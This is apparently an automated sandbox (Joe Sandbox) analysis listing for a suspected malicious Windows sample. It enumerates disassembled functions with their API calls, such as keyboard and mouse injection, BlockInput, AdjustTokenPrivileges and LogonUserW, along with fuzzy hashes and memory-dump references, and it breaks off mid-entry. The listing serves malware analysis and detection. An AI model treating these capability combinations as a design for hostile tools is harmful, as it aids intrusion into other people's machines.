Opcode Fuzzy Hash: 4dc1eeefcc3c0f8aa1f3c1308f9b712973196b87f4334f3ae13e24e9aa12cb52
Instruction Fuzzy Hash: 6472CE31E04228DFCF14EF98D581AAEB7B6FF49310F24806AE905AB251D735EE45CB91

Function 00A5F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A5F599
FindClose.KERNEL32(00000000), ref: 00A5F5C9

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6acc53a54619429e3c8130778f220cbd1fef28772c9cda41441a5ebfac3c56a
Instruction ID: 555521de0884e871e17ae7a8a7d68e67759186671d2597897c9d98363aacce20
Opcode Fuzzy Hash: c6acc53a54619429e3c8130778f220cbd1fef28772c9cda41441a5ebfac3c56a
Instruction Fuzzy Hash: 1811C4326002109FD700EF28D845A2EB3E8FF84325F008A2EF8A5D7291DF30AD058B81

Function 00A5CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00A6BE6A,?,?,00000000,?), ref: 00A5CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00A6BE6A,?,?,00000000,?), ref: 00A5CEB9

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 7fe8db37043d0f4a1f6be5c5b37adc595996fc7126d155467cac0d90ee62bc04
Instruction ID: 8186b9e3f63f4beb16abbbcd6dc4722a443a59d79c248d9574bd441d6b1e9f10
Opcode Fuzzy Hash: 7fe8db37043d0f4a1f6be5c5b37adc595996fc7126d155467cac0d90ee62bc04
Instruction Fuzzy Hash: 75F08271500329BBDB109BA4DC49FEA776DBF08365F004166F915D6191DB309A44CBA0

Function 00A5411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00A54153
keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00A54166

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 49679d544288badcc6186fa42de4f069899bf6d7dd3f4634a0169c445dc902c3
Instruction ID: d2622b71d44f16009dd01b57bbb63dd102f83945dc142aacdd0c3901f9011d81
Opcode Fuzzy Hash: 49679d544288badcc6186fa42de4f069899bf6d7dd3f4634a0169c445dc902c3
Instruction Fuzzy Hash: 7CF06D7090024DAFDB058FA0C805BBE7BB0FF04309F00800AF96596191D7798656DFA0

Function 00A4AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A4ACC0), ref: 00A4AB99
CloseHandle.KERNEL32(?,?,00A4ACC0), ref: 00A4ABAB

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: acf25dab70dbef8ffa7f4a4dc9a75aaa3479a6d7eddd99d5046412306b9418b3
Instruction ID: 2bd35fc09f89f4a2f0ba37a335e1b571955f6f1a6b69e089817a19c10de96638
Opcode Fuzzy Hash: acf25dab70dbef8ffa7f4a4dc9a75aaa3479a6d7eddd99d5046412306b9418b3
Instruction Fuzzy Hash: B3E0BF75000510AFE7252F64FD05D77B7A9EB043217108439B49A81470DB625D919B50

Function 00A381AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00A36DB3,-0000031A,?,?,00000001), ref: 00A381B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00A381BA

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c4cba10bfdd3246ab089a4b9b46f441175a31962eeb45c84c92777790ba9fdaf
Instruction ID: 368cbd1c5c33971ced0200224900c882730ed200fe3b7ba69733b87e0f5f6237
Opcode Fuzzy Hash: c4cba10bfdd3246ab089a4b9b46f441175a31962eeb45c84c92777790ba9fdaf
Instruction Fuzzy Hash: F2B09231244608BBDB006BE1EC09B5A7F68EB08653F004012F60D4C0618F7254928A92

Function 00A177B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A17921

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 9e0b2b529c77ef75d3e132fb4dc62786f2bb0e188225735d2888200f19919448
Instruction ID: 42566d0db9ccaea384f7ca9b3a5dfa8d87177b69d1210776012581bc3669ed95
Opcode Fuzzy Hash: 9e0b2b529c77ef75d3e132fb4dc62786f2bb0e188225735d2888200f19919448
Instruction Fuzzy Hash: 9DA23974E04219DFDF24CF58C4806EDBBB1BF48354F2581A9E859AB391D7349E81DB90

Function 00A23200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON

Download Yara Rule

Strings

`7, xrefs: 00A8933E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: BuffCharUpper
String ID: `7
API String ID: 3964851224-1189063315
Opcode ID: 2baff8166cfe38896706878ff37e62dc02671c70a534ad19a5792c2956c2ac28
Instruction ID: cefd47fdcfb080f589f0159a81b342763970745eee9accb75c9b5bbe057f7292
Opcode Fuzzy Hash: 2baff8166cfe38896706878ff37e62dc02671c70a534ad19a5792c2956c2ac28
Instruction Fuzzy Hash: E592AA716083119FDB24DF18D580B6ABBF1BF89304F18886DE88A8B362D775ED45CB52

Function 00A3D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25f9298b87b166756659a7e387cd2c5cb4ed77e9e8dd5fbf43a67eb9143d3f57
Instruction ID: a5f918d2d64053e1de5de84ab69472f71907a629b0515a5ef7bae303716cedea
Opcode Fuzzy Hash: 25f9298b87b166756659a7e387cd2c5cb4ed77e9e8dd5fbf43a67eb9143d3f57
Instruction Fuzzy Hash: 6F320532D29F018DD7239639D822336A698AFB73D4F15D737F819B5DA6EB29C5834200

Function 00A196C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: eb1551d46d7e4da13da02759c1856845f868f204c42a009ee856b822c416db22
Instruction ID: a3c50046aae14d76c9c16cc35a99f6315bd209e71ed3becddce66922140e3f38
Opcode Fuzzy Hash: eb1551d46d7e4da13da02759c1856845f868f204c42a009ee856b822c416db22
Instruction Fuzzy Hash: 9B22BE715083009FD724EF18C9A0BAFB7E4BF84350F14492DF89A97291DB71E985CB92

Function 00A4038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c232406ee446939b8a5331024e09eadfb9c0d2227e9a6753d4e31c0273c5bd4
Instruction ID: c2c85008579c3abe86c4272078f1c499f3293dc526adcc061f5704d4c161e849
Opcode Fuzzy Hash: 4c232406ee446939b8a5331024e09eadfb9c0d2227e9a6753d4e31c0273c5bd4
Instruction Fuzzy Hash: 6CB1E221D2AF424DD72396798831336B75CAFBB2D5F92D71BFC2A74D62EB2185834180

Function 00A5B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00A5B6DF

Part of subcall function 00A3344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00A5BDC3,00000000,?,?,?,?,00A5BF70,00000000,?), ref: 00A33453
Part of subcall function 00A3344A: __aulldiv.LIBCMT ref: 00A33473

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 7d856323b1d341c4e3461fc1c8104a9bba96eead9f0f3d111e20aa2edddeb34b
Instruction ID: a7939dd1d6d5506854d8980de79dc19baabdecbb69d6f3a12a4b938a1b15a599
Opcode Fuzzy Hash: 7d856323b1d341c4e3461fc1c8104a9bba96eead9f0f3d111e20aa2edddeb34b
Instruction Fuzzy Hash: E22172726355108BCB29CF68C491A52B7E1EB95311B248E7DE4E6CF2C0CB74B909DB54

Function 00A66AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00A66ACA

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 57816a4ee5cd8a863e6024d74fea875a235e3f91245b26ed283a442d3ed482b9
Instruction ID: 17ab7c5c1003912e5134dfad3eb173efbdb377f59c4537b2298dcbffb378c6b8
Opcode Fuzzy Hash: 57816a4ee5cd8a863e6024d74fea875a235e3f91245b26ed283a442d3ed482b9
Instruction Fuzzy Hash: 70E048363102146FC700EFA9D504D96B7FDAF74751F04C426FA45D7251DAB0F8448B90

Function 00A574BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00A574DE

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 5ba119c69b10ba3c0094615edb705a6439d1c522ed181dbbdcdf11afeb19f3f7
Instruction ID: 9530140d10b6bd25643edc11479e53ce8156d5abeb250343cf8696ae049b3e20
Opcode Fuzzy Hash: 5ba119c69b10ba3c0094615edb705a6439d1c522ed181dbbdcdf11afeb19f3f7
Instruction Fuzzy Hash: 02D067A566C60569E9298B24AD1FE7E1928B3007C2F949189B982A94C2A8A0684A9122

Function 00A4B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00A4AD3E), ref: 00A4B124

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 589cee33c4f336a0c7932bc691580a8431d31220fe62d8d62e6f40bf2d9eb62d
Instruction ID: c3c70b56622dae5d70bfacff834a9629537f38eebeac0e6b17016a0ed43d5163
Opcode Fuzzy Hash: 589cee33c4f336a0c7932bc691580a8431d31220fe62d8d62e6f40bf2d9eb62d
Instruction Fuzzy Hash: E8D09E321A464EAEDF029FA4DD06EAE3F6AEB04701F448511FA16D50A1C675D532AB50

Function 00A8B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 00A8B352

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: de32d873d2edf6375f10bbe1b17fdeaec0cbc7599085f31728319ce968445ad0
Instruction ID: 8c9a9e36c745ba538e9f22b98b7279ec967df590f9e36f810e3aa43a2c43e009
Opcode Fuzzy Hash: de32d873d2edf6375f10bbe1b17fdeaec0cbc7599085f31728319ce968445ad0
Instruction Fuzzy Hash: FBC04CF1400109DFD751DBC0C9849EEB7BCAB04301F1040969106F1110DB709B859B72

Function 00A38189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00A3818F

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: cf3e32e4ebcce158693c6bf058ef76a03168a07d87511956a7906d5290d16e43
Instruction ID: b6ba1178204b895be8c8f949f36749b166e3f304e6310c1174cda611857aa457
Opcode Fuzzy Hash: cf3e32e4ebcce158693c6bf058ef76a03168a07d87511956a7906d5290d16e43
Instruction Fuzzy Hash: 51A0113000020CBB8F002B82EC0888A3F2CEA002A2B000022F80C080208B22A8A28A82

Function 00A1E3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3482e11ed4b2e319899f7bad280cfa5265ae7ae439eeffe0fab70a5e12f2d3
Instruction ID: d07747bb03df8daf3cf672f9490fdd1681965c45fcbef191ffd5c6aefc59247c
Opcode Fuzzy Hash: 4b3482e11ed4b2e319899f7bad280cfa5265ae7ae439eeffe0fab70a5e12f2d3
Instruction Fuzzy Hash: BE229C70A00216CFDB24DF58C480AEEB7B1FF18314F288169ED969B351E735AD81CB91

Function 00A193F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f44e3b41c8905e4f0109c7e91603778ca6db0d32d9e3b51adea5751ece4812d
Instruction ID: bbeb7918601e4cc6f9c10f85092624ff33495e77aca28bdd3060f04f600d47c8
Opcode Fuzzy Hash: 6f44e3b41c8905e4f0109c7e91603778ca6db0d32d9e3b51adea5751ece4812d
Instruction Fuzzy Hash: 9D128D70A00209EFDF04DFA9DA95AEEB7F5FF48300F104569E806E7290EB35A951CB64

Function 00A1AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 6ad7cc6f644280edef47faa1c77ca3db90d9a6b61b462109e43cd1afc4c9462e
Instruction ID: 477578c8dde391fd68d7dc27497a3af5564430f35ede48b29731af835db6faee
Opcode Fuzzy Hash: 6ad7cc6f644280edef47faa1c77ca3db90d9a6b61b462109e43cd1afc4c9462e
Instruction Fuzzy Hash: 30029170A00215EFDF14EF68D991ABEBBB5FF48300F118069E806DB295EB31DA55CB91

Function 00A302A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 10d55d20f74f1794046fdc8462ea61e1e8b3844a00f2a7568604dd6ae05e341f
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: EAC194322051A70EDF2E4B3E983583EBAB15AA17B171A177DE4B3CB5D5EF20C524D620

Function 00A306D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
